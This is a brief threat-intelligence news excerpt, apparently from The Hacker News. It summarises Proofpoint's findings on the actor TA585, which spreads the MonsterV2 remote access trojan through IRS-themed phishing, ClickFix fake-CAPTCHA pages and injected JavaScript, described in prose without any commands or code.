"Phishing campaigns distributing the malware have been observed using U.S. Internal Revenue Service (IRS) themed lures to trick users into clicking on fake URLs that direct to a PDF, which, in turn, links to a web page employing the ClickFix social engineering tactic to activate the infection by running a malicious command in the Windows Run dialog or PowerShell terminal. The PowerShell command is designed to execute a next-stage PowerShell script that deploys MonsterV2."
"The Proofpoint Threat Research Team described the threat activity cluster as sophisticated, leveraging web injections and filtering checks as part of its attack chains. "TA585 is notable because it appears to own its entire attack chain with multiple delivery techniques," researchers Kyle Cucci, Tommy Madjar, and Selena Larson said. "Instead of leveraging other threat actors - like paying for distribution, buying access from initial access brokers, or using a third-party traffic delivery system - TA585 manages its own infrastructure, delivery, and malware installation.""
TA585 operates a self-owned attack chain that manages infrastructure, delivery, and malware installation without outsourcing distribution. The actor transitioned from distributing Lumma Stealer to deploying MonsterV2, a remote access trojan, stealer, and loader advertised on criminal forums in February 2025 and also called Aurotun Stealer. Campaigns use IRS-themed phishing lures to direct victims to PDFs that link to pages employing the ClickFix social engineering tactic, triggering malicious commands via the Windows Run dialog or PowerShell. April 2025 waves added malicious JavaScript injections on legitimate sites that present fake CAPTCHA overlays and deliver MonsterV2 through PowerShell execution.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]